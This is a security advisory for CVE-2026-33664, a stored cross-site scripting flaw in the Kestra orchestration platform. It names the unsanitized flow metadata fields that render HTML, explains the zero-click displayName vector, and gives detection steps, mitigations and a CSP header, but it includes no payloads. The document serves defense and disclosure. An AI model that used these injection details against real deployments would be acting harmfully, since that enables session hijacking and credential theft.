CVE-2026-33664: Kestra Orchestration Platform XSS Vulnerability

CVE-2026-33664 Overview

CVE-2026-33664 is a stored Cross-Site Scripting (XSS) vulnerability affecting Kestra, an open-source, event-driven orchestration platform. Versions up to and including 1.3.3 render user-supplied flow YAML metadata fields—specifically description, inputs[].displayName, and inputs[].description—through the Markdown.vue component instantiated with html: true. The resulting HTML is injected into the DOM via Vue's v-html directive without any sanitization, allowing a flow author to embed arbitrary JavaScript that executes in the browser of any user who views or interacts with the flow.

This vulnerability is distinct from GHSA-r36c-83hm-pc8j / CVE-2026-29082, which covers only FilePreview.vue rendering .md files from execution outputs. The present finding affects different components, different data sources, and requires significantly less user interaction—notably zero-click exploitation for input.displayName.

Critical Impact

Authenticated attackers with flow authoring permissions can execute arbitrary JavaScript in victim browsers, potentially leading to session hijacking, credential theft, privilege escalation, and further compromise of the Kestra orchestration environment.

Affected Products

• Kestra versions up to and including 1.3.3
• Kestra Markdown.vue component with html: true configuration
• All Kestra deployments where users can author or modify flows

Discovery Timeline

• 2026-03-26 - CVE-2026-33664 published to NVD
• 2026-03-26 - Last updated in NVD database

Technical Details for CVE-2026-33664

Vulnerability Analysis

This stored XSS vulnerability exists in Kestra's frontend Vue.js components that handle flow YAML metadata rendering. When a flow author creates or modifies a flow, the YAML metadata fields (description, inputs[].displayName, inputs[].description) are processed by the Markdown.vue component. The component is configured with html: true, which allows raw HTML to pass through the Markdown parser without escaping.

The rendered content is then inserted into the DOM using Vue's v-html directive, which directly injects HTML without sanitization. This creates a classic stored XSS condition where malicious payloads embedded in flow metadata persist in the application and execute whenever any user views the affected flow.

The attack surface is particularly concerning because the input.displayName field is rendered in contexts that require no user interaction beyond navigating to the flow, making this a zero-click vulnerability for that specific injection point.

Root Cause

The root cause is the combination of two insecure practices:

1. Unsafe Markdown Configuration: The Markdown.vue component is instantiated with html: true, which permits raw HTML tags to pass through the Markdown renderer unescaped.

2. Missing Output Sanitization: The rendered output is bound to the DOM via Vue's v-html directive without any HTML sanitization library (such as DOMPurify) processing the content first.

This allows any valid HTML, including <script> tags, event handlers (e.g., onerror, onclick), and other JavaScript execution vectors to be embedded in flow metadata and executed in user browsers.

Attack Vector

The attack requires network access and low-privilege authentication (flow authoring permissions). An attacker would craft a malicious flow definition containing JavaScript payloads in the vulnerable YAML metadata fields. When victims browse to the affected flow through the Kestra UI, the malicious script executes in their browser context.

Exploitation scenarios include:

• Session Hijacking: Stealing session tokens or authentication cookies to impersonate victims
• Credential Harvesting: Injecting fake login forms or keyloggers to capture user credentials
• Privilege Escalation: Using administrator sessions to escalate attacker privileges
• Data Exfiltration: Accessing sensitive flow configurations, secrets, or execution outputs visible to the victim
• Lateral Movement: Leveraging the orchestration platform to pivot to connected systems

Since no verified proof-of-concept code is available, technical details can be found in the GitHub Security Advisory.

Detection Methods for CVE-2026-33664

Indicators of Compromise

• Flow YAML files containing HTML tags or JavaScript code in description, inputs[].displayName, or inputs[].description fields
• Unusual script execution or external resource loading observed in browser developer tools when viewing flows
• Unexpected outbound network connections from user browsers to attacker-controlled domains
• Audit logs showing flow modifications with suspicious metadata content

Detection Strategies

• Implement Content Security Policy (CSP) headers to detect and block inline script execution attempts
• Monitor flow modification events for metadata containing HTML tags, <script>, event handlers, or javascript: URIs
• Deploy browser-based XSS detection tools or Web Application Firewalls (WAF) to identify malicious payload patterns
• Review Kestra audit logs for flow creations or updates from unusual sources or containing suspicious patterns

Monitoring Recommendations

• Enable verbose logging for flow creation and modification operations in Kestra
• Configure alerting on CSP violation reports that may indicate XSS exploitation attempts
• Implement regular automated scanning of flow definitions for potentially malicious content
• Monitor for anomalous API calls or data access patterns that may indicate compromised user sessions

How to Mitigate CVE-2026-33664

Immediate Actions Required

• Restrict flow authoring permissions to trusted users only until a patch is available
• Review existing flows for suspicious HTML or JavaScript content in metadata fields
• Implement strict Content Security Policy headers to mitigate XSS impact
• Consider deploying a reverse proxy or WAF with XSS filtering capabilities in front of the Kestra UI

Patch Information

As of the publication date (2026-03-26), it is unclear if a patch is available from Kestra. Organizations should monitor the GitHub Security Advisory for updates on patched versions.

When a patch becomes available, upgrade Kestra to the fixed version immediately. The fix should involve either:

• Configuring the Markdown renderer with html: false to strip HTML tags
• Implementing HTML sanitization using a library like DOMPurify before DOM insertion
• Using Vue's text interpolation instead of v-html for untrusted content

Workarounds

• Enforce strict access controls limiting who can create or modify flows
• Implement a review process for all flow changes that includes metadata inspection
• Deploy Content Security Policy headers with restrictive script-src directives
• Consider sanitizing flow metadata at the API layer before storage

# Example Content Security Policy header configuration for nginx
# Add to server or location block to mitigate XSS impact
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self';" always;